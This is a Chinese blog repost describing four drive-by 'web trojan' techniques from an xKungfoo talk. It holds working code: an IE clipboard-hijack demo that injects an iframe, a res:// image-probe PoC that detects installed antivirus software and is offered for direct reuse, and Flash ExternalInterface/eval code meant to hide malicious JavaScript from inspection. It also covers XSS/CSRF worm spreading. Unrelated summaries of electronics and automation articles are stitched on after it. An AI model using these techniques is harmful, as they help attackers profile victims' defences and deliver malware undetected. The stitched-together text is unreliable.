xKungfoo上的网马猥亵技巧

本文介绍了四种挂马技巧:剪贴板劫持挂马、利用img标签远程检测本地软件、使用Flash封装网马以及Web2.0蠕虫式挂马。这些技巧展示了攻击者如何巧妙地实施攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天xKungfoo 最后一天,G在上面做了个挂马产业链的议题。有些挂马猥亵技巧没有说详细,这里公开吧。其实有些没什么,就是技巧,有些人也玩过。

第一个、剪贴板劫持挂马

其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就会执行一个iframe标签对象(富文本编辑器的性质),iframe加载网马。简单的demo:

<iframe src=http://www.baidu.com/ height=110 width=110></iframe>
<script>
var iframe = document.getElementsByTagName("iframe")[0];
var rng = document.body.createControlRange();
rng.add(iframe);
rng.execCommand('Copy');
</script>

只在IE6下有效,如何去扩展就看各位了,其实一般这样猥亵的技巧仅供娱乐,真正的运用,我觉得也是不太可能的,除非它变得更加猥亵。

第二个、img远程域检测本地域软件安装情况

网马要检测本地安装什么软件?无非就是那些安全软件,卡巴、小红伞、360、365门神(AD:顺便说下,365不是畅游巡警的山寨- -,和360的定位是不一样的)之类。稳定的demo:

<script>
////////////////////////////////////////////////////////
//Name: img标签远程域检测本地域软件是否存在poc
//Description: IE浏览器都有效
//Author: Knownsec Team
//Date: 2008-11-03
////////////////////////////////////////////////////////
knownImg = {}
knownImg.resList = [ //数组中填写本地软件id值与图片地址值(res协议或file协议)
{id: 'Avira', res: 'res://C://Program%20Files//Avira//AntiVir%20PersonalEdition%20Classic//setup.dll/#2/#132'},
{id: 'baidu', res: 'res://C://Program%20Files//baidu//Baidu%20Hi//BaiduHi.exe/#2/#152'},
{id: 'Super Rabbit', res: 'res://C://Program%20Files//Super%20Rabbit//MagicSet//timedate.exe/#2/BBNO'},
{id: '365Menshen', res: 'res://C://Program%20Files//365Menshen//menshen.exe/#2/#227'},
{id: 'quicktime', res: 'res://c://program%20files//quicktime//quicktimeplayer.exe/#2/#403'}
];
knownImg.ok_resList = new Array(); //确认软件存在时,填入此数组
knownImg.tmp_resList = new Array();

knownImg.checkSoft = function(){ //检测函数
if (document.all){
   x = new Array();
   for (i = 0; i < knownImg.resList.length; i++){
    x[i] = new Image();
    x[i].src = "";
    knownImg.ok_resList.push(knownImg.resList[i].id); //将resList里的id值依次扔进ok_resList数组中
    x[i].onload = function(){
     //alert(knownImg.resList[i].id + ': return true');
    }
    x[i].onerror = function(){
     //alert(knownImg.resList[i].id + ': return false');
     knownImg.ok_resList.pop(); //软件不存在时,从ok_resList数组弹出对应的id值
    }
    x[i].src = knownImg.resList[i].res;
   }
}
}
knownImg.checkSoft();

alert(knownImg.ok_resList); //弹出
document.write('你的系统中存在以下软件:<br />'+knownImg.ok_resList.join('<br />'));
</script>

IE6/7/8通杀,我写完这个POC没几天就被告之老外早已经给出POC了,上面这些代码是我们自己探讨出来的,当时对res协议还不太懂,还问了一些朋友。现在我们的这个POC扩展性好,很稳定。大家可以改改直接使用。

第三个、利用Flash封装网马

这个更加猥亵,我们使用服务端技术保护网马,保护来保护去,网马的JS代码还是会被抓到,在那些浏览器抓包工具下,网马的JS暴露无遗,原理很简单,网马再怎么通过判断(比如通过Cookie,IP,referer等)来保护自己,为了危害用户,总是要输出JS来给浏览器去执行,那么就会暴露网马JS代码。那就没什么办法保护我们的网马JS代码了?有……

我们使用Flash来封装网马,这样,使用Flash AS的扩展API:ExternalInterface类,这个类是AS与JS直接通信的最好方式,比如如下AS代码:

import flash.external.*;
ExternalInterface.call("eval","alert(document.domain);function ajax(){var request = false;if(window.XMLHttpRequest) {request = new XMLHttpRequest();} else if(window.ActiveXObject) {var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];for(var i=0; i<versions.length; i++) {try {request = new ActiveXObject(versions[i]);} catch(e) {}}}return request;}var xhr = ajax();function post_it(){var cmd = 'cmd=hi';xhr.open ('POST', 'create_cmd.php', false);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send(cmd);}post_it();");

上面的代码原理是什么呢,ExternalInterface类的call方法可以直接使用Flash容器(这里是HTML页)的JS函数,它有两个参数,第一个是要调用的JS函数名,第二个是被调用的JS函数要执行的参数。我们这里其实是劫持了eval函数,这是JS的内置函数,利用它可以执行任意的JS代码。根据这个原理,我们可以将所有的JS代码封装在Flash文件中。

G使用这个方法成功封装了06014网马,并对我们的Flash压缩加密保护,使用一般的Flash反编译软件是破解不了的,而且在网马的执行过程中,是无法通过浏览器抓包工具抓到网马的JS代码。这就起到了不错的保护作用:)。

第四个、Web2.0蠕虫式挂马

这个要怎么说呢,传统的挂马方式危害很大的有mass sql injection,在短时间内批量注入挂马。我们至今没见到Web2.0蠕虫式的挂马,大家讨论了认为:这是成本问题(但是是不是这样我就不知道了),不是谁都可以轻易写出Web2.0蠕虫。不过大风今天在xKungfoo上说今后会让大家很方便写出XSS蠕虫的,那就是anehta平台 将会提供打包一些蠕虫功能。

Web2.0蠕虫现在有两种表现形式:XSS蠕虫与CSRF蠕虫。在Web2.0蠕虫的传播过程中完全可以挂马。以前放出的一些Web2.0蠕虫都是一个玩笑,没给出危害,但是千万不要认为这永远都是黑客的一个玩笑。我们相信挂马的方式会出现这个的……

恩,这就是今天G的演讲内容的其中一部分。还有一些猥亵的技巧,也许对我们的Webscan全网监控系统都是一个挑战,不过我相信普通挂马者不会使用某些猥亵技巧,那就仅当娱乐吧。

 

 

转自:http://hi.baidu.com/ycosxhack/blog/item/c28fed54d7d0a35fd0090636.html

内容概要:本文详细介绍了900W或1Kw,20V-90V 10A双管正激可调电源充电机的研发过程和技术细节。首先阐述了项目背景,强调了充电机在电动汽车和可再生能源领域的重要地位。接着深入探讨了硬件设计方面,包括PCB设计、磁性器件的选择及其对高功率因数的影响。随后介绍了软件实现,特别是程序代码中关键的保护功能如过流保护的具体实现方法。此外,文中还提到了充电机所具备的各种保护机制,如短路保护、欠压保护、电池反接保护、过流保护和过温度保护,确保设备的安全性和可靠性。通讯功能方面,支持RS232隔离通讯,采用自定义协议实现远程监控和控制。最后讨论了散热设计的重要性,以及为满足量产需求所做的准备工作,包括提供详细的PCB图、程序代码、BOM清单、磁性器件和散热片规格书等源文件。 适合人群:从事电力电子产品研发的技术人员,尤其是关注电动汽车充电解决方案的专业人士。 使用场景及目标:适用于需要高效、可靠充电解决方案的企业和个人开发者,旨在帮助他们快速理解和应用双管正激充电机的设计理念和技术要点,从而加速产品开发进程。 其他说明:本文不仅涵盖了理论知识,还包括具体的工程实践案例,对于想要深入了解充电机内部构造和工作原理的人来说是非常有价值的参考资料。
内容概要:本文档详细介绍了机器人/AGV/AMR与电梯系统之间的模式切换操作指南。涵盖人工切换模式、智能自动切换以及智慧软件调控三大方面。通过AGV模式切换读卡器实现人工与机器人模式间的转换,利用无源触点隔离技术和多协议适配接口确保电梯与机器人系统的无缝对接,并设有硬件级互锁电路保障安全。智能自动切换中,机器人通过485通讯、TCP/IP等与电梯控制系统交互,在确认安全条件下启动专用模式并及时恢复。故障应急响应策略包括三级容错机制、智能诊断系统和安全优先策略,确保电梯运行的安全性和可靠性。智慧软件调控则根据场景需求灵活调整模式,提升物流高峰时段的运输效率,同时兼顾日常的人性化需求。硬件协同部分介绍了AGV电梯控制主板、楼层触点扩展板、电梯状态检测器、楼层传感器和外呼控制器等组件的作用。 适合人群:从事机器人、AGV、AMR研发与维护的技术人员,以及负责电梯系统集成和管理的专业人士。 使用场景及目标:①实现机器人/AGV/AMR与电梯系统的无缝对接;②确保模式切换过程中的安全性与可靠性;③提高物流高峰时段的运输效率;④优化日常运营中的人性化需求。 其他说明:本文档不仅提供了具体的操作步骤和技术细节,还强调了系统设计的安全性和智能化特点,适用于各类主流电梯品牌,并通过多种通信协议实现了广泛的兼容性。
内容概要:本文详细介绍了如何利用西门子200SMART PLC与两台三菱E700变频器通过Modbus RTU协议实现通信的方法。文中涵盖了硬件准备、通信协议设置、PLC程序设计、变频器设置与响应、源程序及其注释、相关软件工具和使用说明。具体来说,文章首先介绍了所需的硬件设备如PLC、变频器、通信电缆和触摸屏,然后讲解了Modbus RTU通信协议的具体设置,包括波特率、数据位等参数的配置。接着,文章展示了PLC程序的设计思路,重点在于如何用Modbus指令完成数据交互,并通过详细的注释使程序易于理解。此外,还涉及了变频器作为从站的设置方法,确保其能正确响应PLC发出的命令。最后,提供了昆仑通泰触摸屏软件、200SMART V2.4编程软件、变频器应用说明书等辅助工具,方便用户更好地掌握整个系统的运作。 适用人群:从事工业自动化领域的工程师和技术人员,尤其是那些需要深入了解PLC与变频器间通信机制的人群。 使用场景及目标:适用于希望构建高效稳定的工业控制系统的企业和个人开发者。通过学习本文提供的实例,读者可以掌握PLC与变频器之间的Modbus通信技术,从而实现对生产设备的精准控制,提升工作效率的同时减少能源消耗。 其他说明:本文不仅提供了理论指导,还有实际的操作指南和完整源代码,有助于读者快速上手实践。同时,配套的软件和文档资料也为后续的学习和项目开发打下了坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值